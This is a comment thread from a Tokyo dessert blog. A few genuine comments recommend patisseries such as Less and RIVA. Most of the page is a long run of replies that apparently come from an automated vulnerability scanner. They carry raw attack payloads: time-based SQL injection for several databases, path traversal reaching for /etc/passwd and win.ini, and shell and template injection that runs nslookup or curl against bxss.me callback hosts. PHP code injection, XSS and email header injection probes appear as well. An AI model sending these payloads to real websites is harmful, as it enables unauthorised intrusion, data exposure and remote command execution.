Just saw this. "Less" near Ebisu Garden Place https://tabelog.com/tokyo/A1303/A130302/13239458/. The cakes are tiny and expensive and there isn't much choice but it's one of the very best and it's never busy and conveniently located.
I'm not really a dessert person so take my recommendation with a grain of salt. Ungrain in Minamiaoyama, I went once and its a nice little shop, need to book a session before you visit. Think they have different offerings with seasonal ingredients.
I can second RIVA (the patisserie affiliated with LESS). Yuji Ajiki also makes a fantastic roll cake and fromage cru petit gateaux, but is located in the middle of nowhere :p.
Found A Tes Souhaits overrated, despite its high Tabelog score. Same goes for Asako Iwayanagi (the parfaits are nice but not ¥6000 nice).
4 Comments
Just saw this. "Less" near Ebisu Garden Place https://tabelog.com/tokyo/A1303/A130302/13239458/. The cakes are tiny and expensive and there isn't much choice but it's one of the very best and it's never busy and conveniently located.
re: thetokyogourmet
x2vDjdkk
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
1*
re: thetokyogourmet
-1 OR 2+842-842-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+842-842-1=0+0+0+1
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
RjWiDvLp'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 698=(SELECT 698 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 864=(SELECT 864 FROM PG_SLEEP(15))--
re: thetokyogourmet
ag5WOuTV' OR 412=(SELECT 412 FROM PG_SLEEP(15))--
re: thetokyogourmet
FyOT3zwq') OR 406=(SELECT 406 FROM PG_SLEEP(15))--
re: thetokyogourmet
Zh4emVbb')) OR 808=(SELECT 808 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@JbxhA
re: thetokyogourmet
1CakGBb7EEO
re: thetokyogourmet
%0abcc:074625.67-19886.67.f6e4e.19990.2@bxss.me
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-19887.67.f6e4e.19990.2@bxss.me
re: thetokyogourmet
response.write(9084454*9592714)
re: thetokyogourmet
'+response.write(9084454*9592714)+'
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
"+response.write(9084454*9592714)+"
re: thetokyogourmet
${10000438+9999060}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
'.gethostbyname(lc('hitrp'.'trtxvjsvfcf33.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(82).chr(115).chr(79).'
re: thetokyogourmet
)
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
".gethostbyname(lc("hitmu"."szurpjqqd87a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(72).chr(122).chr(83)."
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
echo sluqfb$()\ xozipx\nz^xyu||a #' &echo sluqfb$()\ xozipx\nz^xyu||a #|" &echo sluqfb$()\ xozipx\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
&echo edxodp$()\ nncwfb\nz^xyu||a #' &echo edxodp$()\ nncwfb\nz^xyu||a #|" &echo edxodp$()\ nncwfb\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
|echo kyllbj$()\ ohblae\nz^xyu||a #' |echo kyllbj$()\ ohblae\nz^xyu||a #|" |echo kyllbj$()\ ohblae\nz^xyu||a #
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
(nslookup hitpcytrcbara71448.bxss.me||perl -e "gethostbyname('hitpcytrcbara71448.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
$(nslookup hitrsxdzajstu395fb.bxss.me||perl -e "gethostbyname('hitrsxdzajstu395fb.bxss.me')")
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(97).concat(73).concat(107).concat(65)+(require"socket"
Socket.gethostbyname("hitqj"+"vfopnnff06ea6.bxss.me.")[3].to_s)+"
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
&nslookup hitvjcguidctzbf56b.bxss.me&'\"`0&nslookup hitvjcguidctzbf56b.bxss.me&`'
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(115).concat(71).concat(102).concat(84)+(require'socket'
Socket.gethostbyname('hitfn'+'jtziztzu16cc3.bxss.me.')[3].to_s)+'
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
&(nslookup hitoqfuhyifyvc3447.bxss.me||perl -e "gethostbyname('hitoqfuhyifyvc3447.bxss.me')")&'\"`0&(nslookup hitoqfuhyifyvc3447.bxss.me||perl -e "gethostbyname('hitoqfuhyifyvc3447.bxss.me')")&`'
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
|(nslookup hitjnythsgsqf56a3a.bxss.me||perl -e "gethostbyname('hitjnythsgsqf56a3a.bxss.me')")
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
`(nslookup hitfftqobifel26717.bxss.me||perl -e "gethostbyname('hitfftqobifel26717.bxss.me')")`
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
bxss.me
re: thetokyogourmet
;(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")|(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")&(nslookup hitfhzofbireh87c39.bxss.me||perl -e "gethostbyname('hitfhzofbireh87c39.bxss.me')")
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
'"
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
<!--
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+363-363-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+363-363-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+61-61-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+61-61-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+36-36-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+36-36-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+167-167-1=0+0+0+1 or 'HrpfSHQW'='
re: thetokyogourmet
-1' OR 3+167-167-1=0+0+0+1 or 'HrpfSHQW'='
re: thetokyogourmet
-1" OR 2+616-616-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+616-616-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
yrvHspQd'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 715=(SELECT 715 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 286=(SELECT 286 FROM PG_SLEEP(15))--
re: thetokyogourmet
vjhPXZqN' OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: thetokyogourmet
jOEZ1Zxr') OR 111=(SELECT 111 FROM PG_SLEEP(15))--
re: thetokyogourmet
QLmYkosF')) OR 852=(SELECT 852 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@I1kxT
re: thetokyogourmet
1YHGDML4M0
re: thetokyogourmet
response.write(9562545*9436745)
re: thetokyogourmet
'+response.write(9562545*9436745)+'
re: thetokyogourmet
"+response.write(9562545*9436745)+"
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
${10000271+9999255}
re: thetokyogourmet
../
re: thetokyogourmet
)
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
echo autefa$()\ rkpppe\nz^xyu||a #' &echo autefa$()\ rkpppe\nz^xyu||a #|" &echo autefa$()\ rkpppe\nz^xyu||a #
re: thetokyogourmet
&echo qqlmid$()\ hxdnhi\nz^xyu||a #' &echo qqlmid$()\ hxdnhi\nz^xyu||a #|" &echo qqlmid$()\ hxdnhi\nz^xyu||a #
re: thetokyogourmet
'.gethostbyname(lc('hitzb'.'ztthidge70063.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(82).chr(113).chr(72).'
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
|echo jhmrsn$()\ xkxdhw\nz^xyu||a #' |echo jhmrsn$()\ xkxdhw\nz^xyu||a #|" |echo jhmrsn$()\ xkxdhw\nz^xyu||a #
re: thetokyogourmet
".gethostbyname(lc("hitdy"."pdvfmusped429.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(77).chr(100).chr(73)."
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: thetokyogourmet
expr 9000880726 - 916922
re: thetokyogourmet
gethostbyname(lc('hitfs'.'qysexivle974b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(72).chr(122).chr(85)
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
(nslookup -q=cname hitnphsnafdvg38096.bxss.me||curl hitnphsnafdvg38096.bxss.me))
re: thetokyogourmet
$(nslookup -q=cname hitjenbhmzruice5d8.bxss.me||curl hitjenbhmzruice5d8.bxss.me)
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
&nslookup -q=cname hithzbouggjvo77ae1.bxss.me&'\"`0&nslookup -q=cname hithzbouggjvo77ae1.bxss.me&`'
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
&(nslookup -q=cname hitnjigckjpzib828a.bxss.me||curl hitnjigckjpzib828a.bxss.me)&'\"`0&(nslookup -q=cname hitnjigckjpzib828a.bxss.me||curl hitnjigckjpzib828a.bxss.me)&`'
re: thetokyogourmet
bxss.me
re: thetokyogourmet
|(nslookup -q=cname hitmqglzktvnx441c0.bxss.me||curl hitmqglzktvnx441c0.bxss.me)
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
`(nslookup -q=cname hitetuehyyeug5be2f.bxss.me||curl hitetuehyyeug5be2f.bxss.me)`
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
;(nslookup -q=cname hitonkdbojiew9799c.bxss.me||curl hitonkdbojiew9799c.bxss.me)|(nslookup -q=cname hitonkdbojiew9799c.bxss.me||curl hitonkdbojiew9799c.bxss.me)&(nslookup -q=cname hitonkdbojiew9799c.bxss.me||curl hitonkdbojiew9799c.bxss.me)
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitkckmptwqdfb307e.bxss.me||curl${IFS}hitkckmptwqdfb307e.bxss.me)
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hituabtxmhcmo8a51a.bxss.me||curl${IFS}hituabtxmhcmo8a51a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituabtxmhcmo8a51a.bxss.me||curl${IFS}hituabtxmhcmo8a51a.bxss.me)&`'
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
'"()
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
'&&sleep(27*1000)*cyldvt&&'
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
"&&sleep(27*1000)*uqciyr&&"
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
'||sleep(27*1000)*ebpnwq||'
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(122).concat(81).concat(117).concat(75)+(require"socket"
Socket.gethostbyname("hitxz"+"kmgvbghxb60e2.bxss.me.")[3].to_s)+"
re: thetokyogourmet
"||sleep(27*1000)*mpfzhg||"
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(108).concat(71).concat(103).concat(78)+(require'socket'
Socket.gethostbyname('hitnh'+'mcjiafktdd5f4.bxss.me.')[3].to_s)+'
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(97).concat(79).concat(114).concat(73)+(require'socket'
Socket.gethostbyname('hitwf'+'kyineuak43310.bxss.me.')[3].to_s)
re: thetokyogourmet
'"
re: thetokyogourmet
<!--
re: thetokyogourmet
replies
re: thetokyogourmet
replies�
re: thetokyogourmet
replies/.
re: thetokyogourmet
'"()&%<zzz><ScRiPt >TXh2(9587)</ScRiPt>
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvloypjndkrf8f43.bxss.me")}}
re: thetokyogourmet
'"()&%<zzz><ScRiPt >TXh2(9928)</ScRiPt>
re: thetokyogourmet
9514466
re: thetokyogourmet
TVJBlpLs
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
IEkBb6Dj'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 969=(SELECT 969 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 962=(SELECT 962 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 278=(SELECT 278 FROM PG_SLEEP(15))--
re: thetokyogourmet
ySMfMKCL' OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: thetokyogourmet
rYpf7dXp') OR 38=(SELECT 38 FROM PG_SLEEP(15))--
re: thetokyogourmet
fGf0b5Bs')) OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
